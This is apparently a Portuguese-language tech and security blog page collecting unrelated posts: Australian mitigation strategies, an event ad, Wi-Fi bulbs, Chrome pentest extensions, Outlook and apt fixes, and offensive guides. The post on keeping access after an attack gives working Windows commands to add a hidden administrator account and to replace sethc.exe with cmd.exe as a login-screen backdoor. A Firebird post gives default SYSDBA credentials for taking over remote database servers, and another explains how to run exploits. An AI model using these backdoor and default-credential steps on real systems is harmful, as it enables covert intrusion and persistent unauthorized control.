Estratégias para mitigar intrusões direcionadas

Excelente texto do Sandro Suffert

Apesar de sabermos que vulnerabilidades em aplicações (SQL Injection, Cross Site Scripting, etc..) são muito exploradas por adversários, o caminho mais fácil para invadir uma empresa é explorar seu elo mais fraco: o usuário

O vídeo abaixo, da Silicium Sec, demonstra visualmente a facilidade de se obter sucesso com um ataque deste tipo (são mostrados 5 passos):

Além de explorar os usuários – que devem ser treinados para se conscientizar destes riscos e serem capazes de reagir adequadamente a este tipo de ataque – os atacantes contam também com a falta de preparo de administradores de T.I. e times de Segurança da Informação.

Mas afinal, o que as empresas devem fazer para que não sejam vítimas deste tipo de ataque?

O governo australiano,  através de seu “Defence Signals Dictorate” acaba de divulgar um update para a lista de “Top 35 Mitigation Strategies” com algumas mudanças na priorização na “efetividade” das estratégias recomendadas de mitigação – vale a pena conferir e considerar na priorização de ações de defesa.
A tabela disponibilizada são medidos várias características da estratégia, incluindo “Efetividade Global de Segurança“, a “Resistência dos Usuários“, os “Custos de Implementação”, os “Custos de Manutenção” e também se: a estratégia Previne e/ou Detecta a intrusão; e se ajuda a mitigar quais estágios da intrusão.
HTML /Tabela (PNG) / PDF
As dez estratégias de defesa mais eficientes:
  1. Whitelisting de Aplicações
  2. Patching de Aplicações
  3. Patching de Sistemas Operacionais
  4. Minimizar os usuários com permissões administrativas locais ou de domínio
  5. Desabilitar contas de administrador locais
  6. Autenticação de múltiplos fatores
  7. Segmentação e segregação de redes
  8. Firewall de Aplicação em Estações de trabalho para negar tráfico ‘entrante
  9. Firewall de Aplicação em Estações de trabalho para negar tráfico ‘sainte
  10. Sistema Virtualizado não persistente para atividades arriscadas como leitura de email e navegação na internet.

 

Veja todas as 35 estratégias no site oficial – Top 35 Mitigation Strategies.

 

Evento:Techquila – RJ

entrada fundoBanner ets Evento no RJ reunirá viciados em tecnologia, mobile e mídias sociais. Inscreva se.Vagas limitadas!!!

Junte-se a nós e seja mais um abduzido !!!

O Encontro de Tecnologia Simonsen (ETS) foi criado com o intuito de reunir profissionais da área, estudantes e todos os aficionados por tecnologia. Um encontro que já reuniu mais de milhares de pessoas em suas últimas edições. Um evento sem fins lucrativos que visa apresentar novas ideias e incentivar a troca de experiências.

junte se a nos quarto geek Evento no RJ reunirá viciados em tecnologia, mobile e mídias sociais. Inscreva se.Vagas limitadas!!!

O que vai rolar no evento?

Nesta edição foi preparada uma grade de programação praticamente toda voltada para os temas Mobile e Mídias Sociais. Serão palestras e workshops com excelentes profissionais das áreas.

Você poderá também passear pelos stands e participar dos diversos sorteios oferecidos por nossos parceiros e patrocinadores.

CONFIRA A GRADE DE PROGRAMAÇÃO

guanabara Evento no RJ reunirá viciados em tecnologia, mobile e mídias sociais. Inscreva se.Vagas limitadas!!!

Link do evento: AQUI

Lâmpadas LED com Wi-Fi e Controle Via Smartphone

GreenWave Reality anunciou durante a Hong Kong International Lighting Fair um novo sistema de lâmpadas LED Wi-Fi que promete controle total sobre a iluminação da casa com simplicidade e sem necessidade de eletricista ou obra.

O sistema GreenWave Reality Connected Lighting Solution é formado de lâmpadas LED (Energy Star) com antenas WI-FI, sensores de movimentos e qualidade de luz muito similar a uma lâmpada incandescente com 80% menos de gasto de energia, um controle remoto e uma central Gateway que se conecta ao roteador da casa. Assim é possível ter controle total sobre a iluminação, incluindo os gastos de cada lâmpada e o consumo total.

Com o Connected Lighting Solution é possível controlar as lâmpadas individualmente ou em grupo usando o controle remoto, um smartphone ou até remotamente via internet. O sistema vem com alguns padrões pré-programados como “home”, “away” ou “night” e permite a criação de programas customizados, inclusive com os sensores de movimentos. Para implementar o sistema é só trocar as lâmpadas comuns pelas lâmpadas Wi-Fi, conectar o Gateway ao roteador sem fio e está pronto.

O Connected Lighting Solution ainda não está a venda no mercado aberto, mas você pode ter mais informações no site da GreenWave Reality

Fonte:DigitalDrops

Extensões do Google Chrome pra pentest em aplicações web

Pequena lista de extensões interessantes e úteis que podem ajudar a muitos de nós, quando estamos a fazer um pentest.

XSS RAYS:

Ferramenta objetiva que verifica a existência de vulnerabilidades XSS e encontra como um site está  filtrando código, e também comprova se á injeções e inspeciona objetos.

Adicionar ao Google ChromeClique Aqui!

GOOGLE HACK DATA BASE:


Esta aplicação permite uma melhor compreensão da segurança web base. Para encontrar a descrição de uma vulnerabilidade, clique em “Pesquisar” no http://www.exploit-db.com. O aplicativo oferece a capacidade de busca de vulnerabilidades no site especificado. Basta clicar no botão de busca e digite o nome do site.

Adicionar ao Google ChromeClique Aqui!

WEBSECURIFY SCANNER:

Websecurify é uma solução avançada de teste construído para identificar com rapidamente e precisão os problemas de segurança em aplicações web. Websecurify você economiza tempo e dinheiro automatizando a técnica usada por especialistas para encontrar vulnerabilidades.

Adicionar ao Google ChromeClique Aqui!

HPP FINDER:

HPP Finder é uma extensão do Chrome concebido para detectar tentativas de HPP. HPP Finder pode detectar formas de URLs e HTML.
HTTP Parameter Pollution (HPP) é uma técnica de exploração web recentemente descoberto. Por favor, leia o documento NDSS 2010 para obter mais detalhes técnicos sobre.

Adiciona ao Google ChromeClique Aqui!

FORM FUZZER:

Este é um teste de fuzz, utilitário criado para ajudar a preencher formulários na web com alguns dados aleatórios.

Adicionar ao Google ChromeClique Aqui!

SITE SPIDER:

Use essa extensão para encontrar links quebrados em um site. Você pode restringir o spidering para um diretório de domínio, ou qualquer outra expressão regular. Aspider pode seguir um link mais longe do que esta restrição, permitindo encontrar links externos quebrados.

Adicionar ao Google ChromeClique Aqui!

XSS CHEF:

Sempre que você encontrar uma vulnerabilidade de XSS a extensão do Chrome, o chef vai facilitar a exploração.

Adicionar ao Google Chrome :   Clique Aqui!

Fonte:Secmaster

Resolver problema de indexação no Outlook 2010

Para que a Pesquisa Instantânea possa ser habilitada no Microsoft Outlook 2010, o Windows Search 4.0 ou posterior deverá ser instalado no computador. Se o Windows Search 4.0 não estiver instalado, será solicitado que você baixe o software quando o Outlook 2010 for iniciado.

O Windows Search 4.0 do Windows 7     é ativado por padrão. Se você não puder usar a Pesquisa Instantânea, talvez o Windows Search esteja desativado. No Painel de Controle, clique em Programas e, em Programas e Recursos, clique em Ativar ou desativar recursos do Windows. Marque a caixa de seleção Windows Search.

A Pesquisa Instantânea do Windows Vista ou anterior     é habilitada automaticamente em computadores que executam o Windows Vista Service Pack 2 (SP2). Se o seu computador estiver executando uma versão do Windows anterior ao Vista SP2, baixe o Windows Search 4.0 desta maneira:

  1. Clique na guia Arquivo.
  2. Clique em Opções.
  3. Clique em Pesquisar.
  4. Em Atualização do Mecanismo de Pesquisa, clique em Atualizar Pesquisa.

Desativar a Pesquisa Instantânea

  1. Clique na guia Arquivo.
  2. Clique em Opções.
  3. Clique em Pesquisar.
  4. Em Fontes, clique em Indexando Opções.
  5. Desmarque as caixas de seleção em Indexar mensagens nestes arquivos de dados.

Desmarcar as caixas de seleção desabilita a funcionalidade de pesquisa, mas não remove o painel Pesquisa Instantânea.

O texto Clique aqui para habilitar a Pesquisa Instantânea será exibido abaixo do painel Pesquisa Instantânea se você adiar a habilitação da Pesquisa Instantânea.

Desativar o aviso para instalar o Windows Search

Para evitar a exibição do aviso de instalação do Windows Desktop Search sempre que você abrir o Outlook, siga este procedimento:

  1. Clique na guia Arquivo.
  2. Clique em Opções.
  3. Clique em Pesquisar.
  4. Em Fontes, desmarque a caixa de seleção Mostrar aviso para habilitar a Pesquisa Instantânea.

 

Outro link que pode ajudar: http://office.microsoft.com/en-us/outlook-help/instant-search-is-not-finding-items-HA010198085.aspx

 

Corrigindo erros ao executar apt-get update

Abra o terminal e abraseu sources.list usando o seguinte comando:

sudo gedit /etc/apt/sources.list

assumindo que vc está usando sua sources.list padrão, você deve ter permissão para modificar o arquivo que abriu e inserir as linhas abaixo:

## MAIN REPOSITORIES
deb http://gb.archive.ubuntu.com/ubuntu/ hardy main restricted universe multiverse

## MAJOR BUG FIX UPDATES produced after the final release
deb http://gb.archive.ubuntu.com/ubuntu/ hardy-updates main restricted universe multiverse

## UBUNTU SECURITY UPDATES
deb http://security.ubuntu.com/ubuntu hardy-security main restricted universe multiverse

## BACKPORTS REPOSITORY
deb http://gb.archive.ubuntu.com/ubuntu/ hardy-backports main restricted universe multiverse

## PROPOSED REPOSITORY
deb http://archive.ubuntu.com/ubuntu hardy-proposed main restricted universe multiverse

Agora salve e feche o arquivo, e faça um refresh da lista executando o seguinte comando:

sudo apt-get update

Explorando vulnerabilidade: Firebird Database Default Credentials

Firebird Database Tools

There are plenty of tools to interact with Firebird. Most commonly that can be grouped into either a client or a Database management tool. We’ll look at one of each.

FlameRobin (Client)

FlameRobinis a database administration tool for Firebird RDBMS. Their goal is to build a tool that is:

  • lightweight (small footprint, fast execution)
  • cross-platform (Linux, Windows, Mac OS X, FreeBSD, Solaris)
  • dependent only on other Open Source software”

–Source: http://www.flamerobin.org/

It is easily installed on BackTrack (or other distros that utilize apt):
<

 root@bt:~# apt-get install flamerobin

To run, launch X windows and type:

 root@bt:~# flamerobin

You may get the following error message, ignore it and continue:

 root@bt:~# The configuration file:
/root/.flamerobin/fr_databases.conf does not exist or cannot be opened.
This is normal for first time users.  You may now register new servers and databases.

nterrogating the Database

With access to the database, you can do any number of tasks. We'll look a couple to get you started. 

Retrieve Remote Server Version

Using FlameRobin, first “register” the remote server so you are able to communicate with it. First open the FlameRobin GUI, then goto Server -> Register Server -> and enter the following:
  • Display name: Friendly name to call the host, I use the IP
  • Hostname: Hostname or IP address
  • Port Number: will usually be 3050, however this instance is running on another port.
 

Registering the Server so we can communicate with it


 Next, right click on the server that you just registered, choose "Retrieve server version" and provide your credentials. The default firebird username and password is usually:

 Username: SYSDBA
 Password: masterkey



 You should be provided the version number as shown below:



Adding/Changing Users

Another useful task is to add or change user accounts. An interesting piece of information is that the Firebird database does not check any characters beyond 8 in a password. Thus the masterkey default password might as well be “masterke” as the ‘y’ at the end is never checked because it is beyond 8 characters. Additionally, usernames are not case sensitive, however passwords are CaSe SeNsItIvE.

With FlameRobin

Use the instructions above in the “Retrieve Remote Server Version” section in order to register the remote server if you have not done so already. Then right-click on the server that you just registered, select "Manage Users" and enter the SYSDBA credentials if they are not saved from the remote version enumeration above.



 To add a user, just click "Add User" and provide the required information! To modify other users (including changing their passwords) by clicking on the “details” icon which looks like a magnifying glass over a piece of paper.

Mantendo acesso no windows após ataque (basico)

não vou me dar ao trabalho de traduzir dessa vez, muitos jã conehcem essa técnica que é basica! A preguiça nao me deixou traduzir! hauaa desculpem pessoal!

We will discuss 2 most commonly used methods of maintaining access in windows usually called as Backdoors.

1. In the first technique, After getting access to the system we create user account with administrator privilege, thus intrusion again is easy. Use the following commands in the command prompt or you can execute it as a premade batch file.
net user /add "username" "password"
net localgroup administrators /add "username"
reg add "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\Userlist" /v username /t REG_DWORD /d 0
2. The second method is more efficient and it is a much secret approach. The method is behind the following vulnerability. In window before logging in, that is when the login screen shows up there is only one .exe file that can be execute. The File is named “sethc.exe” in the system32 directory. This file is used to switch on the sticky keys and can be invoked by pressing shift key 5 times.
What we do here is that we rename the “cmd.exe” in System32 directory to “sethc.exe”, so that command prompt opens with administrator privilege when shift is pressed 5 times. But renaming as such in system32 directory is not possible so we copy the cmd.exe to some other location, rename it  to “sethc.exe”and replace it with the old “sethc.exe”.
If you have administrator access to the account, execute the following command in cmd or as a batch file. You can also do it manually following the above steps, because it is just a rename and moving job.
takeown /f "C:\Windows\system32\sethc.exe"
cacls "C:\Windows\System32\sethc.exe" /e /p %username%:F
copy "C:\Windows\system32\cmd.exe" C:\Windows\"
rename "C:\Windows\cmd.exe" sethc.exe
rename "C:\Windows\system32\sethc.exe" sethc.exe.old
copy "C:\Windows\sethc.exe" "C:\Windows\system32\"
If you don’t have administrator access,  Boot off a windows recovery DVD, press Shift+F10 to spawn CMD, and type
copy "C:\Windows\system32\cmd.exe" C:\Windows\"
rename "C:\Windows\cmd.exe" sethc.exe
rename "C:\Windows\system32\sethc.exe" sethc.exe.old
copy "C:\Windows\sethc.exe" "C:\Windows\system32\"
Very similar to the other one, just you didn’t need to edit permissions.
Now you will notice at any time (even when nobody is logged in and when you’re at the welcome screen) you can spawn cmd as an administrator by pressing shift 5 times quickly.

 

Como executar scripts/exploits

Algumas pessoas ainda tem dificuldade de como executar scripts/exploits, então nesse post inaugural e talvez nos seguintes, estou pensando em postar coisas básicas pra depois irmos engrossando o caldo. Então Como executar scripts/exploits?Os scritps mais comuns que vocês podem encontrar são escritos em:

Linguagem – Extensão

Perl *.pl
Python *.py
Ruby *.rb
Shell Script *.sh
C *.c
java *.jar

Levando em conta que você já tem os interpretadores instalados, falta executar o script/exploit. Shell Script geralmente usa o interpretador bash, você já vai ter ele instalado no linux, os interpretadores de perl,python e c muitas vezes já vêm instalados, depende da distribuição linux que você está usando.

No prompt de comando:

Executando um script/exploit em perl:

perl nomedoexploit.pl

Executando um script/exploit em python:

python nomedoexploit.py

Executando um script/exploit em ruby:

Executando um script/exploit em shell:

./nomedoprograma.sh

Verificar se o script tem permissão de execução, para dar a permissão, use o comando:

chmod +x nomedoprograma.sh

Executando um script/exploit em c:

Na linguagem em c, temos que compilar o script para poder transformar ele num executável.

gcc nomedoexploit.c -o nomedesejado

Se o programa não contém erros, será criado um executável com o nome que você escolheu, agora você precisa executar ele.

./nomedesejado

Se der algum erro, é possível que o programa tenha herdado restrições de permissões quando foi criado, você tem que aplicar a permissão de execução.

chmod +x nomedesejado
./nomedesejado

Executando um script/exploit em java:

java -jar nomedesejado.jar

Cretidos: Animal

FOnte:ebr